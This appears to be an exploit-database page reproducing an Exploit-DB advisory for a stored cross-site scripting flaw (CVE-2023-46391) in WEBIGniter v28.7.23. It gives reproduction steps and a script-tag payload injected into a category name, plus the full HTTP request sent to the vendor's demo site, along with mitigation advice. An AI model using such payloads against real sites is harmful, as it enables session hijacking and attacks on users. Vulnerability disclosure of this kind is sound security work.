header-logo
Suggest Exploit
vendor:
WEBIGniter
by:
Sagar Banwa
6.1
CVSS
HIGH
Stored Cross-site scripting (XSS)
79
CWE
Product Name: WEBIGniter
Affected Version From: v28.7.23
Affected Version To: v28.7.23
Patch Exists: NO
Related CWE: CVE-2023-46391
CPE: webigniter:webigniter:28.7.23
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Kali Linux
2023

WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)

Stored Cross-site scripting (XSS) is a severe vulnerability where a malicious script is inserted directly into a vulnerable web application, leading to potential attacks on users. This exploit allows an attacker to inject a malicious script into the 'Name' section of the category in WEBIGniter v28.7.23.

Mitigation:

To mitigate this vulnerability, input validation on user inputs should be performed to filter out potentially malicious scripts. Additionally, encoding user-generated content before displaying it can help prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS)
# Exploit Author: Sagar Banwa
# Date: 19/10/2023
# Vendor: https://webigniter.net/
# Software: https://webigniter.net/demo
# Reference: https://portswigger.net/web-security/cross-site-scripting
# Tested on: Windows 10/Kali Linux
# CVE : CVE-2023-46391


Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

Steps-To-Reproduce:

1. Login to the Account 
2. Go to the Categories.
3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php


Request 

POST /cms/categories/add HTTP/2
Host: demo.webigniter.net
Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: https://demo.webigniter.net
Referer: https://demo.webigniter.net/cms/categories/add
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

Navigation

Suggest Exploit

Services By CQR